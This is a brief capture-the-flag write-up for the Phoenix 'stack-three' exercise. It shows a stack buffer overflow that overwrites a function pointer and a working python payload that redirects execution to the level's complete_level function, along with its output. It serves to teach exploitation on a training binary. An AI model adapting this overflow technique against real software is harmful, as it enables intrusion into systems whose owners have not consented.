Stack 3
Write-up for: Stack Three
This is again very similar, but this time we are overwriting a function pointer via stdin.
user@phoenix-amd64:/opt/phoenix/i486$ ./stack-three
Welcome to phoenix/stack-three, brought to you by https://exploit.education
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
calling function pointer @ 0x41414141
Segmentation fault
The buffer is again 64 bytes large. Thus we can precisely target the function pointer value.
Where do we want to jump instead? Looking at the symbols we can see a function called complete_level:
objdump -t stack-three
08048535 g F .text 00000020 complete_level
Since we have no memory protection, let’s just jump there
user@phoenix-amd64:/opt/phoenix/i486$ python -c 'print "A"*64 + "\x08\x04\x85\x35"[::-1]' | ./stack-three
Welcome to phoenix/stack-three, brought to you by https://exploit.education
calling function pointer @ 0x8048535
Congratulations, you've finished phoenix/stack-three :-) Well done!ongratulations, you've finished phoenix/stack-three :-) Well done!
Don’t forget the little endianness ;)